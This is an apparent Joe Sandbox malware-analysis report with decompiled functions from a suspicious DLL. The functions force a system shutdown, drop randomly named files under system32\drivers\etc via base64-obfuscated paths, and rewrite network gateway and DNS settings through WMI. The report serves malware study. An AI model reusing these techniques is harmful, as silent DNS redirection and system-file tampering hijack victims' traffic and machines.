Instruction ID: a30d9a41c0b764188012c088025fa824fd0bff4a88c7a91d48d8e585c0123706
Opcode Fuzzy Hash: 6a62bc2528f7a5b567bc78c0f48248627d88bb206eba26def179137dd21eb727
Instruction Fuzzy Hash: E1B00472519392ABDF02DFA1CE4882ABAB6BB88301F084D5CF2A540071C7328428EB02

Uniqueness

Uniqueness Score: -1.00%

Function 10003F63 Relevance: 1.5, APIs: 1, Instructions: 4
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003F63(int _a4, long _a8) {

				return ExitWindowsEx(_a4, _a8);
			}

0x10003f71

APIs

ExitWindowsEx.USER32(?,?), ref: 10003F6B

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExitWindows
String ID:
API String ID: 1089080001-0
Opcode ID: a0d9fa97b1e1e39b06bdef1288d6089e46bfaf0110e54166fccdcd3b95f73ca3
Instruction ID: 4ef2750e7b628f6ec6f30376c7cf025ff7e7fc08bc077e4d2af0ab61b57d367d
Opcode Fuzzy Hash: a0d9fa97b1e1e39b06bdef1288d6089e46bfaf0110e54166fccdcd3b95f73ca3
Instruction Fuzzy Hash: 3BA00175509212ABDE025B51CE4884ABEA6AB89381F00C868F18940031C73294A1EB12

Uniqueness

Uniqueness Score: -1.00%

Function 100121ED Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

', xrefs: 100121FC

Memory Dump Source

Source File: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: c66cf635900fd9560f5d33fce30572d65f1195a3a7c35dcba06b6c48dfc04a12
Instruction ID: f389f15fd0a8877f73eb6a91fb6ffbaafb7a2d8a217a3cbe01a0a4cb358a3832
Opcode Fuzzy Hash: c66cf635900fd9560f5d33fce30572d65f1195a3a7c35dcba06b6c48dfc04a12
Instruction Fuzzy Hash: 5581276940E3D19FC7438B785CF91823FA2AE1B24434F09DAC4C09F4B7E1995D49C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 026E00CD Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62f34c450c3ba46a9bfd7c7600c86e50cf775180cb61537211fd409f1f57de4
Instruction ID: f71a1d995dd8a74e42fea6d118e748ebb32253c85ead114849ce9a4637845e86
Opcode Fuzzy Hash: e62f34c450c3ba46a9bfd7c7600c86e50cf775180cb61537211fd409f1f57de4
Instruction Fuzzy Hash: 0D5206726083558BDB0CCE29C59026EFBE2FFC4344F154A2EE89797394D7B19949CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1000B71E Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
Instruction ID: 4ac6500bd546590d7ea14c6efde5edf5aedc1e10ba929c21bb6b156839336c8c
Opcode Fuzzy Hash: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
Instruction Fuzzy Hash: D7314C33E2C6B607E324DF7A4C84025F7D6EB4A0A275A8779DE88E3255D128EC11CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 100053B7 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E100053B7(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
				intOrPtr _v8;
				void _v71;
				char _v72;
				void _v331;
				char _v332;
				void _v591;
				char _v592;
				void _v851;
				char _v852;
				void _v4947;
				signed char _v4948;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t82;
				int _t86;
				int _t88;
				CHAR* _t104;
				void* _t118;
				signed int _t120;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				CHAR* _t132;
				CHAR* _t136;
				CHAR* _t138;
				intOrPtr _t142;
				signed int _t147;
				signed int _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t168;
				int _t169;
				void* _t170;
				int _t183;
				intOrPtr _t186;
				void* _t198;
				void* _t199;
				void* _t202;
				intOrPtr _t204;
				void* _t205;
				void* _t206;
				signed int _t216;
				void* _t220;

				_t220 = __fp0;
				_t170 = __edx;
				_t144 = __ecx;
				E1000CD20(0x1350, __ecx);
				if(_a12 != 0) {
					_t82 =  *0x10015fb8; // 0x0
					_t202 =  *((intOrPtr*)(_a8 + 0xc)) - _t82;
					_t183 = 0;
					__eflags = 0;
					do {
						_push(_t82 + 0xfffffffe);
						_push(_a4 + _t183);
						_push( *0x10015fc8);
						_t86 = E1000CDA6(_a4 + _t183, _t144, _t170, __eflags);
						_t206 = _t206 + 0xc;
						__eflags = _t86;
						_t82 =  *0x10015fb8; // 0x0
						if(_t86 == 0) {
							_t183 = _t183 + _t82 - 1;
						}
						_t183 = _t183 + 1;
						__eflags = _t183 - _t202;
					} while (__eflags <= 0);
				} else {
					_t204 =  *0x1000e1b8;
					_t142 =  *0x1000e248;
					_t186 =  *((intOrPtr*)(_a8 + 0xc)) -  *0x10015fb8;
					_t4 =  &_a12;
					 *_t4 = _a12 & 0x00000000;
					_t216 =  *_t4;
					_v8 = _t186;
					do {
						_t88 =  *0x10015fb8; // 0x0
						_push(_t88 - 1);
						_push(_a12 + _a4);
						_push( *0x10015fc8);
						_t82 = E1000CDA6(_a4, _a12 + _a4, _t170, _t216);
						_t206 = _t206 + 0xc;
						_t217 = _t82;
						if(_t82 == 0) {
							_v72 = _v72 & _t82;
							_t147 = 0xf;
							memset( &_v71, _t82, _t147 << 2);
							asm("stosw");
							asm("stosb");
							wsprintfA( &_v72, "%s\\%s", 0x100165a4, 0x100165a8);
							_v4948 = _v4948 & 0x00000000;
							memset( &_v4947, 0, 0x3ff << 2);
							asm("stosw");
							asm("stosb");
							E10005318(0, _t217,  &_v4948);
							_v852 = _v852 & 0x00000000;
							_t151 = 0x40;
							_v592 = _v592 & 0x00000000;
							memset( &_v851, 0, _t151 << 2);
							asm("stosw");
							asm("stosb");
							_push(0x40);
							memset( &_v591, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							wsprintfA( &_v852, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
							_push(0x100165a8);
							_t104 = E10001000(0, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz");
							_t155 = 0x100165a4;
							wsprintfA( &_v592, _t104);
							_push(0);
							_push( &_v852);
							E1002B8D2(_t142, _t155, _t170, 0x100165a4, _t204);
							asm("cdq");
							E1000443D( &_v4948, _t142, _t155, _t170,  &_v4948,  &_v592);
							_pop(_t157);
							E10021A45( *_a8 + _a12, _t142, _t157, _t170, 0x100165a4, _t204, _t217);
							_v332 = _v332 & 0x00000000;
							_t158 = 0x40;
							_t118 = memset( &_v331, 0, _t158 << 2);
							asm("stosw");
							asm("stosb");
							0x1003a38c(_t142, 0, _t170,  *0x10015ff4,  *_a8 + _a12,  &_v72, 9, 0);
							E100274E5(_t118, _t142, _t170, _t204, _t205, _t217);
							_t120 = rand();
							asm("cdq");
							_t162 = 0x18;
							_t198 = 0x61;
							_t122 = rand();
							asm("cdq");
							_t163 = 0x19;
							_t124 = rand();
							asm("cdq");
							_t164 = 0x17;
							_t126 = rand();
							asm("cdq");
							_t165 = 0x19;
							_t128 = rand();
							asm("cdq");
							_t166 = 0x18;
							_t130 = rand();
							asm("cdq");
							_t167 = 0x19;
							_t170 = _t130 % _t167 + _t198;
							_t132 = E10001000(_t167, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj");
							_t168 = _t170;
							wsprintfA( &_v332, _t132);
							_t206 = _t206 + 0x8c;
							_t136 =  &_v332;
							0x10036371(0x40000000, 1, 0, 2, 0, 0, _t128 % _t166 + _t198, _t126 % _t165 + _t198, _t124 % _t164 + _t198, _t122 % _t163 + _t198, _t120 % _t162 + _t198, 0, _t118);
							_t199 = _t136;
							_push(_t136);
							_push(_t170);
							E10023C7B(_t136, _t142, _t168, _t199, _t204, 0);
							Sleep(0x3e8);
							_t138 =  &_v332;
							_push(_t138);
							_push(_t138);
							E1002EC87(_t138, _t142, _t168, 0);
							_t169 =  *0x10015fb8; // 0x0
							_t186 = _v8;
							_t82 = _a12 + _t169 - 1;
							_a12 = _t82;
						}
						_a12 = _a12 + 1;
					} while (_a12 <= _t186);
				}
				return _t82;
			}

0x100053b7
0x100053b7
0x100053b7
0x100053bf
0x100053ca
0x100055e9
0x100055ee
0x100055f0
0x100055f0
0x100055f2
0x100055f5
0x100055fb
0x100055fc
0x10005602
0x10005607
0x1000560a
0x1000560c
0x10005611
0x10005613
0x10005613
0x10005617
0x10005618
0x10005618
0x100053d0
0x100053d3
0x100053da
0x100053e3
0x100053e9
0x100053e9
0x100053e9
0x100053ed
0x100053f0
0x100053f0
0x100053f9
0x100053ff
0x10005400
0x10005406
0x1000540b
0x1000540e
0x10005410
0x10005416
0x1000541b
0x1000541f
0x10005421
0x10005423
0x10005437
0x10005439
0x1000544d
0x1000544f
0x10005451
0x10005459
0x1000545e
0x10005467
0x10005470
0x10005477
0x10005479
0x1000547b
0x1000547c
0x10005487
0x10005489
0x1000548b
0x1000549e
0x100054a3
0x100054ae
0x100054b3
0x100054bc
0x100054c7
0x100054c9
0x100054ca
0x100054cf
0x100054de
0x100054e7
0x100054fc
0x10005502
0x1000550b
0x10005516
0x10005518
0x1000551a
0x1000551c
0x10005523
0x1000552a
0x1000552e
0x1000552f
0x10005534
0x10005538
0x1000553c
0x1000553d
0x10005543
0x10005547
0x10005548
0x1000554e
0x10005552
0x10005553
0x10005559
0x1000555d
0x1000555e
0x10005564
0x10005568
0x10005569
0x1000556c
0x10005574
0x10005579
0x10005582
0x10005584
0x10005590
0x1000559c
0x100055a1
0x100055a2
0x100055a3
0x100055a4
0x100055ae
0x100055b4
0x100055ba
0x100055bb
0x100055bc
0x100055c4
0x100055ca
0x100055cd
0x100055d1
0x100055d1
0x100055d4
0x100055d7
0x100055e0
0x1000561f

APIs

wsprintfA.USER32 ref: 10005437
wsprintfA.USER32 ref: 1000549E
wsprintfA.USER32 ref: 100054BC
PrintFile.ABC(?,?,?,00000000), ref: 100054DE
rand.MSVCRT ref: 1000552A
rand.MSVCRT ref: 10005538
rand.MSVCRT ref: 10005543
rand.MSVCRT ref: 1000554E
rand.MSVCRT ref: 10005559
rand.MSVCRT ref: 10005564
wsprintfA.USER32 ref: 10005582
Sleep.KERNEL32(000003E8,?,00000000,40000000,00000001,00000000,00000002,00000000,00000000,?,?,?,?,00000009,00000000,?), ref: 100055AE

Strings

Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
c:\windows\system32\drivers\%s, xrefs: 10005498
Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
%s\%s, xrefs: 10005431

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: rand$wsprintf$FilePrintSleep
String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
API String ID: 2577056782-455112146
Opcode ID: eee3dc6be947996a921319d690027e2d4820ae61922b7a4e00a9d481ac99203d
Instruction ID: 64546e9388752df838bc4033515aa0a8afcfc879ecc6bfc3b3dc2cd959c3d1fd
Opcode Fuzzy Hash: eee3dc6be947996a921319d690027e2d4820ae61922b7a4e00a9d481ac99203d
Instruction Fuzzy Hash: 0D610873A40258BFEB10DB64CC46FDF77ADEB84351F184466F604AB180CBB5EA818A64

Uniqueness

Uniqueness Score: -1.00%

Function 1000721F Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 366
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1000721F(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t141;
				void* _t142;
				intOrPtr* _t150;
				intOrPtr _t151;
				intOrPtr* _t152;
				intOrPtr _t153;
				intOrPtr* _t160;
				intOrPtr _t161;
				void* _t162;
				intOrPtr* _t164;
				intOrPtr _t165;
				intOrPtr* _t170;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t183;
				intOrPtr _t184;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t193;
				intOrPtr* _t194;
				void* _t196;
				signed int _t201;
				intOrPtr _t204;
				void* _t209;
				intOrPtr* _t210;
				intOrPtr _t215;
				intOrPtr* _t226;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr* _t239;
				intOrPtr* _t242;
				intOrPtr* _t245;
				intOrPtr _t256;
				intOrPtr _t260;
				intOrPtr* _t261;
				void* _t266;

				_t307 = __fp0;
				_t272 = __eflags;
				_t254 = __edi;
				_t250 = __edx;
				_t209 = __ebx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_push(__esi);
				E1000774B();
				_push("IPEnabled=TRUE");
				_push("Win32_NetworkAdapterConfiguration");
				 *((intOrPtr*)(_t266 - 4)) = 0;
				if(E100077B2(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t272, __fp0) == 0) {
					L61:
					_t215 = _t266 - 0x7c;
					 *((intOrPtr*)(_t266 - 4)) = 0xb;
					_t141 = E1002A8C6(E10007A27(_t215), _t209, _t215, _t250, _t254, _t266);
					asm("cld");
					 *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) =  *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) - 1;
					asm("adc al, [eax]");
					 *((intOrPtr*)(_t209 + 0x645ef44d)) =  *((intOrPtr*)(_t209 + 0x645ef44d)) + _t215;
					 *0 = _t215;
					return _t141;
				} else {
					_push(__edi);
					 *((intOrPtr*)(_t266 - 0x14)) = 0;
					 *((char*)(_t266 - 4)) = 1;
					if( *((intOrPtr*)(_t266 - 0x68)) != 0) {
						_t201 =  *((intOrPtr*)(_t266 - 0x64)) -  *((intOrPtr*)(_t266 - 0x68));
						_t275 = _t201 & 0xfffffffc;
						if((_t201 & 0xfffffffc) > 0) {
							_push("Index");
							_push(0);
							_push(_t266 - 0x28);
							_t254 = E10007A73(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t275, __fp0);
							_t204 =  *_t254;
							if(_t204 != 0) {
								0x1003afbd(_t254, _t204 + 8);
							}
							E10007696(_t266 - 0x14);
							 *((intOrPtr*)(_t266 - 0x14)) =  *_t254;
							E10007696(_t266 - 0x28);
						}
					}
					_t142 = E1000767F(_t266 - 0x14, _t250);
					_t278 = _t142;
					if(_t142 == 0) {
						L59:
						_t217 =  *((intOrPtr*)(_t266 - 0x14));
						_pop(_t254);
						if( *((intOrPtr*)(_t266 - 0x14)) != 0) {
							E1000515C(_t142, _t217);
							 *((intOrPtr*)(_t266 - 0x14)) = 0;
						}
						goto L61;
					}
					_push(_t209);
					_push("Win32_NetworkAdapterConfiguration.Index=");
					E1000504D(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
					_t219 = _t266 - 0x18;
					_push(_t266 - 0x14);
					 *((char*)(_t266 - 4)) = 2;
					_t142 = E1000762A(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
					_t210 =  *0x1000e218;
					 *((intOrPtr*)(_t266 - 0x10)) = 0;
					 *((intOrPtr*)(_t266 - 0x28)) = 0;
					if( *((intOrPtr*)(_t266 + 8)) != 0) {
						_push( *((intOrPtr*)(_t266 + 8)));
						_t142 = E1000CD02(_t219, 0);
						_t280 = _t142;
						_pop(_t219);
						if(_t142 != 0) {
							_t219 = _t266 - 0x7c;
							_push(_t266 - 0x10);
							_push("SetGateways");
							_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t280, _t307);
							_t281 = _t142;
							if(_t142 >= 0) {
								asm("stosd");
								_t260 = 1;
								 *((intOrPtr*)(_t266 - 0x38)) = 0;
								_push( *((intOrPtr*)(_t266 + 8)));
								 *((intOrPtr*)(_t266 - 0x3c)) = _t260;
								E1000504D(_t210, _t266 - 0x24, _t250, _t260, 0, _t281, _t307);
								_t170 =  *((intOrPtr*)(_t266 - 0x24));
								 *((char*)(_t266 - 4)) = 3;
								_t282 = _t170;
								if(_t170 == 0) {
									_t171 = 0;
									__eflags = 0;
								} else {
									_t171 =  *_t170;
								}
								 *((intOrPtr*)(_t266 - 0x2c)) = _t171;
								_t173 =  *_t210(8, _t260, _t266 - 0x3c);
								_t261 =  *0x1000e230;
								 *((intOrPtr*)(_t266 - 0x1c)) = _t173;
								 *((intOrPtr*)(_t173 + 0xc)) = _t266 - 0x2c;
								 *_t261(_t266 - 0x4c);
								 *((intOrPtr*)(_t266 - 0x44)) =  *((intOrPtr*)(_t266 - 0x1c));
								_t177 = 1;
								 *((short*)(_t266 - 0x4c)) = 0x2008;
								 *((intOrPtr*)(_t266 - 0x30)) = _t177;
								_t178 =  *_t210(3, _t177, _t266 - 0x3c);
								 *((intOrPtr*)(_t266 - 0x20)) = _t178;
								 *((intOrPtr*)(_t178 + 0xc)) = _t266 - 0x30;
								 *_t261(_t266 - 0x5c);
								_push("DefaultIPGateway");
								 *((short*)(_t266 - 0x5c)) = 0x2003;
								 *((intOrPtr*)(_t266 - 0x54)) =  *((intOrPtr*)(_t266 - 0x20));
								_t183 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8, _t250, _t261, 0, _t282, _t307)));
								 *((char*)(_t266 - 4)) = 4;
								_t283 = _t183;
								if(_t183 == 0) {
									_t184 = 0;
									__eflags = 0;
								} else {
									_t184 =  *_t183;
								}
								_t239 =  *((intOrPtr*)(_t266 - 0x10));
								 *((intOrPtr*)( *_t239 + 0x14))(_t239, _t184, 0, _t266 - 0x4c, 0);
								 *((char*)(_t266 - 4)) = 3;
								E10007696(_t266 + 8);
								_push("GatewayCostMetric");
								_t188 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8,  *_t239, _t266 - 0x4c, 0, _t283, _t307)));
								 *((char*)(_t266 - 4)) = 5;
								_t284 = _t188;
								if(_t188 == 0) {
									_t189 = 0;
									__eflags = 0;
								} else {
									_t189 =  *_t188;
								}
								_t242 =  *((intOrPtr*)(_t266 - 0x10));
								 *((intOrPtr*)( *_t242 + 0x14))(_t242, _t189, 0, _t266 - 0x5c, 0);
								 *((char*)(_t266 - 4)) = 3;
								E10007696(_t266 + 8);
								_push("SetGateways");
								_t193 =  *((intOrPtr*)(E1000504D(_t210, _t266 - 0x34,  *_t242, _t266 - 0x5c, 0, _t284, _t307)));
								 *((char*)(_t266 - 4)) = 6;
								if(_t193 == 0) {
									 *((intOrPtr*)(_t266 + 8)) = 0;
								} else {
									 *((intOrPtr*)(_t266 + 8)) =  *_t193;
								}
								_t194 =  *((intOrPtr*)(_t266 - 0x18));
								if(_t194 == 0) {
									_t250 = 0;
									__eflags = 0;
								} else {
									_t250 =  *_t194;
								}
								_t254 = _t266 - 0x28;
								_t245 =  *((intOrPtr*)(_t266 - 0x78));
								_t196 =  *((intOrPtr*)( *_t245 + 0x60))(_t245, _t250,  *((intOrPtr*)(_t266 + 8)), 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t254, 0);
								_t246 =  *((intOrPtr*)(_t266 - 0x34));
								if( *((intOrPtr*)(_t266 - 0x34)) != 0) {
									E1000515C(_t196, _t246);
								}
								0x10035685(_t254,  *((intOrPtr*)(_t266 - 0x1c)));
								 *_t254();
								_t142 =  *_t254( *((intOrPtr*)(_t266 - 0x20)));
								_t219 =  *((intOrPtr*)(_t266 - 0x24));
								 *((char*)(_t266 - 4)) = 2;
								if( *((intOrPtr*)(_t266 - 0x24)) != 0) {
									_t142 = E1000515C(_t142, _t219);
								}
							}
						}
					}
					if( *((intOrPtr*)(_t266 + 0xc)) == 0) {
						L31:
						if( *((intOrPtr*)(_t266 + 0x10)) == 0) {
							L57:
							_t220 =  *((intOrPtr*)(_t266 - 0x18));
							_pop(_t209);
							if( *((intOrPtr*)(_t266 - 0x18)) != 0) {
								_t142 = E1000515C(_t142, _t220);
								 *((intOrPtr*)(_t266 - 0x18)) = 0;
							}
							goto L59;
						}
						_push( *((intOrPtr*)(_t266 + 0x10)));
						_t142 = E1000CD02(_t219, 0);
						_t292 = _t142;
						if(_t142 == 0) {
							goto L57;
						}
						L33:
						_push(_t266 - 0x10);
						_push("SetDNSServerSearchOrder");
						_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t292, _t307);
						_t293 = _t142;
						if(_t142 >= 0) {
							_push( *((intOrPtr*)(_t266 + 0xc)));
							asm("stosd");
							asm("stosd");
							asm("stosd");
							 *((intOrPtr*)(_t266 - 0x58)) = 0;
							 *((intOrPtr*)(_t266 - 0x5c)) = 2;
							E1000504D(_t210, _t266 + 0xc, _t250, _t266 - 0x58, 0, _t293, _t307);
							_push( *((intOrPtr*)(_t266 + 0x10)));
							 *((char*)(_t266 - 4)) = 7;
							E1000504D(_t210, _t266 + 8, _t250, _t266 - 0x58, 0, _t293, _t307);
							_t150 =  *((intOrPtr*)(_t266 + 0xc));
							 *((char*)(_t266 - 4)) = 8;
							if(_t150 == 0) {
								_t151 = 0;
								__eflags = 0;
							} else {
								_t151 =  *_t150;
							}
							 *((intOrPtr*)(_t266 - 0x3c)) = _t151;
							_t152 =  *((intOrPtr*)(_t266 + 8));
							_t295 = _t152;
							if(_t152 == 0) {
								_t153 = 0;
								__eflags = 0;
							} else {
								_t153 =  *_t152;
							}
							 *((intOrPtr*)(_t266 - 0x38)) = _t153;
							_t256 =  *_t210(8, 1, _t266 - 0x5c);
							 *((intOrPtr*)(_t256 + 0xc)) = _t266 - 0x3c;
							 *0x1000e230(_t266 - 0x4c);
							_push("DNSServerSearchOrder");
							 *((short*)(_t266 - 0x4c)) = 0x2008;
							 *((intOrPtr*)(_t266 - 0x44)) = _t256;
							_t160 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t250, _t256, 0, _t295, _t307)));
							 *((char*)(_t266 - 4)) = 9;
							if(_t160 == 0) {
								_t161 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t160;
							}
							_t226 =  *((intOrPtr*)(_t266 - 0x10));
							_t257 = _t266 - 0x4c;
							_t251 =  *_t226;
							_t162 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, _t161, 0, _t266 - 0x4c, 0);
							_t227 =  *((intOrPtr*)(_t266 + 0x10));
							 *((char*)(_t266 - 4)) = 8;
							_t297 =  *((intOrPtr*)(_t266 + 0x10));
							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
								E1000515C(_t162, _t227);
							}
							_push("SetDNSServerSearchOrder");
							_t164 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t251, _t257, 0, _t297, _t307)));
							 *((char*)(_t266 - 4)) = 0xa;
							if(_t164 == 0) {
								_t165 = 0;
								__eflags = 0;
							} else {
								_t165 =  *_t164;
							}
							_t229 =  *((intOrPtr*)(_t266 - 0x18));
							if(_t229 == 0) {
								_t250 = 0;
								__eflags = 0;
							} else {
								_t250 =  *_t229;
							}
							_t230 =  *((intOrPtr*)(_t266 - 0x78));
							_t142 =  *((intOrPtr*)( *_t230 + 0x60))(_t230, _t250, _t165, 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t266 - 0x28, 0);
							_t231 =  *((intOrPtr*)(_t266 + 0x10));
							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
								_t142 = E1000515C(_t142, _t231);
								 *((intOrPtr*)(_t266 + 0x10)) = 0;
							}
							_t232 =  *((intOrPtr*)(_t266 + 8));
							if( *((intOrPtr*)(_t266 + 8)) != 0) {
								_t142 = E1000515C(_t142, _t232);
								 *((intOrPtr*)(_t266 + 8)) = 0;
							}
							_t233 =  *((intOrPtr*)(_t266 + 0xc));
							if( *((intOrPtr*)(_t266 + 0xc)) != 0) {
								_t142 = E1000515C(_t142, _t233);
								 *((intOrPtr*)(_t266 + 0xc)) = 0;
							}
						}
						goto L57;
					}
					_push( *((intOrPtr*)(_t266 + 0xc)));
					_t142 = E1000CD02(_t219, 0);
					_pop(_t219);
					if(_t142 != 0) {
						goto L33;
					}
					goto L31;
				}
			}

0x1000721f
0x1000721f
0x1000721f
0x1000721f
0x1000721f
0x10007224
0x1000722c
0x10007230
0x10007237
0x1000723c
0x10007244
0x1000724e
0x100075fc
0x100075fc
0x100075ff
0x1000760b
0x10007613
0x10007614
0x1000761a
0x1000761c
0x10007622
0x10007629
0x10007254
0x10007254
0x10007255
0x1000725b
0x1000725f
0x10007264
0x10007267
0x1000726c
0x1000726e
0x10007276
0x10007277
0x10007280
0x10007282
0x10007286
0x1000728d
0x1000728d
0x10007295
0x1000729f
0x100072a2
0x100072a2
0x1000726c
0x100072aa
0x100072af
0x100072b1
0x100075ec
0x100075ec
0x100075ef
0x100075f2
0x100075f4
0x100075f9
0x100075f9
0x00000000
0x100075f2
0x100072b7
0x100072b8
0x100072c0
0x100072c8
0x100072cb
0x100072cc
0x100072d0
0x100072d8
0x100072de
0x100072e1
0x100072e4
0x100072ea
0x100072ed
0x100072f2
0x100072f4
0x100072f5
0x100072fe
0x10007301
0x10007302
0x10007307
0x1000730c
0x1000730e
0x10007319
0x1000731f
0x10007320
0x10007323
0x10007326
0x10007329
0x1000732e
0x10007331
0x10007335
0x10007337
0x1000733d
0x1000733d
0x10007339
0x10007339
0x10007339
0x1000733f
0x10007349
0x1000734b
0x10007354
0x10007357
0x1000735e
0x10007365
0x10007368
0x1000736c
0x10007376
0x10007379
0x1000737e
0x10007381
0x10007388
0x1000738d
0x10007395
0x1000739b
0x100073a3
0x100073a5
0x100073a9
0x100073ab
0x100073b1
0x100073b1
0x100073ad
0x100073ad
0x100073ad
0x100073b3
0x100073c0
0x100073c6
0x100073ca
0x100073cf
0x100073dc
0x100073de
0x100073e2
0x100073e4
0x100073ea
0x100073ea
